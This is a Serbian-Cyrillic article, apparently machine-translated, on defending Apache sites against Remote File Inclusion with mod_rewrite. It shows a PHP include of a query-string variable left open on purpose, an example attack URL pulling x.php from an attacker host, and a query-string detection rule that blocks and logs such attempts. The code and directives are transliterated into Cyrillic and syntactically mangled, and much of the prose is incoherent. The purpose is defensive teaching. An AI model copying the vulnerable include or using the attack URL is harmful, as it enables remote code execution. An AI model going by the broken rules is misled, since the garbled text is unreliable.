Користећи мод_реврите да спречи укључивање удаљених датотека

Један од најчешћих напада претрпео сајтова врши се преко покушај да се укључи фајлове са злонамерним кодом, теоретски говорећи о нападу је веома једноставан за извођење, да то уради само зато што фајл који садржи злонамерни код и УРЛ адресу за тип претраживача.

Овај тип напада, познат по технички термин за Ремоте Филе Инцлусион или једноставно скраћеница за РФИ, је често повезана са режим се зове упад КССА (Цросс-сервер Напад) обично ради да угрози безбедност Веб локација ако не Веб сервера, фактор који је чини још опасно РФИ.

Да бисте покренули напад РФИ, нападач треба "сећање" у оквиру примене у којима се даљински да његово укључивање, овај "простор" је генерално "рупа" (буг) безбедности, што га чини рањивим сценарио.
Класичан случај цурења осетљивих на РФИ се односи на доношење стране кроз имена променљивих, само једноставан део кода као што је овај да угрози примену:

 



 # Инцлуде фајлове преко Куеристринг променљиве прошао кроз







 укључују ($ _ГЕТ ['страна']);

 

У кода смо Ундефинед вариабле, односно да буду дефинисани у складу са параметрима послата путем Куеристринг, на пример, ако директан УРЛ странице која садржи предложени списак би изгледао овако:

 



 хттп://ввв.сито.цом/индек.пхп?пагина=невс.пхп

 

вредност променљиве $ страница је једнак "Новости" напад на ове молбе, може се извршити на овај начин:

 



 хттп://ввв.сито.цом/индек.пхп?пагина=хттп://ввв.аттаццо.цом/к.пхп

 

Фајл "к.пхп", у случају успешног напада, могао би да садржи било коју врсту злонамерног кода и изазивају оштећење далеко значајније него и дефинитиван једноставност напад може бити да мисле.

Срећом, постоје неке одбрамбене технике које се могу користити за спречавање таквих напада, у току овог кратког ћемо анализирати један по модулу УРЛ адресе преправи (мод_реврите) које Апацхе Веб сервера, што може бити коришћен од стране метода другачије.

Један од најважнијих класичних да пошаље инструкције Апацхе Веб сервера је коришћење класичне. Хтаццесс фајл да се укључе у фасциклу коју желите да заштитите од напада.

Први метод који ми користимо је да убаците једноставно правило у А. хтаццесс фајл:

 РевритеЦонд% {} КУЕРИ_СТРИНГ (.*)( хттп | хттпс | ФТП): \ / \ /(.*)







 ^(.+)$ РевритеРуле - [Ф]

Правило каже да формулисао у Куеристринг ("{КУЕРИ_СТРИНГ}") не могу пренети аргументе који садржи суфикса "хттп", "хттпс" и "ФТП", без обзира на садржај претходну или наредну ("(.*)" ) параметара. Ако се то деси веб сервера ће се вратити грешке типа 403 (забрањене).

Они који имају могућност директног приступа конфигурациони фајл Апацхе (хттпд.цонф), може да се убаци у један контејнер који садржи директиве могу да имају ефекат упоредив са правилима прописаним предедентементе:

 # Проверите да ли је мод_реврите је на располагању







 <ИфМодуле Мод_реврите.ц>







 # Активирајте УРЛ препише мотор

 





 РевритеЕнгине на

 





 # Ми смо поставили наше правило против РФИ







 РевритеЦонд% {} КУЕРИ_СТРИНГ (.*)( хттп | хттпс | ФТП): \ / \ /(.*)







 # Филтрирајте могући захтеви за укључивање и ознака до







 # Враибиле са окружењем [Е = варнаме: вредност]







 ^(.+)$ РевритеРуле - [Ф, Е = РФИ: истина]

 





 </ ИфМодуле>

 





 # Цреаимо дневник покушаја да се РФИ смо идентфицато







 # Претходно користили "променљиве окружења"







 ЦустомЛог / фолдер_наме / рфи.лог комбинацији енв = РФИ

После писања директиву конфигурационом фајлу, морате да сачувате промене и поново покрените Веб сервер ступиле на снагу, имајте у виду да на крају листе, и ван контејнера је постављена захтев за креирање лог фајл намењена за снимање захтеве Ремоте Филе Инцлусион, праћење овог малог "блокира белешке за РФИ напада", ми ћемо открити да покушаји Ремоте Филе Инцлусион наше Веб локације су мање него ретки веровао.